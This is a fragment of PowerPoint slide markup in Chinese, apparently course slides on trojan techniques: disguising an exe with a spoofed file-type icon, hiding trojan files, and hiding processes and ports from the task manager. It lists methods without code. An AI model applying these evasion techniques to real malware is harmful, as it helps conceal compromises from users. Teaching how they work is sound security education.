      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件类型图标诱骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="184178" y="2708823"/>
            <a:ext cx="4752975" cy="2876550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4058281" y="2524399"/>
            <a:ext cx="4752975" cy="2809875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140279" y="3541767"/>
            <a:ext cx="4714875" cy="2847975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105173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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="10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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="10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blinds(horizontal)">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74579" y="1412273"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的自定义软件图标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件类型图标诱骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="289855" y="2197100"/>
            <a:ext cx="6924675" cy="2828925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401217" y="2081540"/>
            <a:ext cx="7398954" cy="4429125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401217" y="3334077"/>
            <a:ext cx="6696075" cy="1924050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3345307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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="55"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p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="2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69627" y="1380742"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>某种方式使用户无法发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>木马文件和目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐藏在其它文件中：如无文件木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>勾选文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录属性中的“隐藏”，文件浏览器不可见（除非开启显示所有文件）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、木马文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2506718" y="1501172"/>
            <a:ext cx="3943350" cy="4486275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804115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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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2">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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="3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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、进程隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79878" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620713" y="1370560"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐藏木马进程，使得任务管理器等工具不可见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是指程序的进程仍然存在，只不过是让它消失在进程列表里。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>则是让程序彻底的消失，不以一个进程或者服务的方式工作。 </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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、进程隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="1554163"/>
            <a:ext cx="8228012" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>设置窗口不可见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从任务栏中隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>把木马程序注册为服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从进程列表中隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>欺骗查看进程的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>	           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从进程列表中隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>使用可变的高端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="336600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="336600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口隐藏技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="336600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>使用系统服务端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="336600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="336600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口隐藏技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="336600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>替换系统驱动或系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真隐藏技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>动态嵌入技术                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真隐藏技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）设置窗口不可见</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554558" y="1250041"/>
            <a:ext cx="7980362" cy="4817140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
